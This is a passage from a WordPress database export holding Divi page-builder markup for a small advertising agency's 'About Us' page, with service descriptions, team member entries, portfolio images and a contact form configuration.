custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-1.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Shubham\" title_text=\"Google Adword Expert\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 20:44:31','2020-08-08 20:44:31','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(726,1,'2020-08-08 20:47:50','2020-08-08 20:47:50','Founder WhatTheHell?','Founder WhatTheHell?','','inherit','open','closed','','artboard-copy-6','','','2020-08-08 20:48:19','2020-08-08 20:48:19','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6.jpg',0,'attachment','image/jpeg',0),(727,1,'2020-08-08 20:49:52','2020-08-08 20:49:52','','Artboard (2)','','inherit','open','closed','','artboard-2-3','','','2020-08-08 20:49:52','2020-08-08 20:49:52','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg',0,'attachment','image/jpeg',0),(728,1,'2020-08-08 20:49:59','2020-08-08 20:49:59','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" 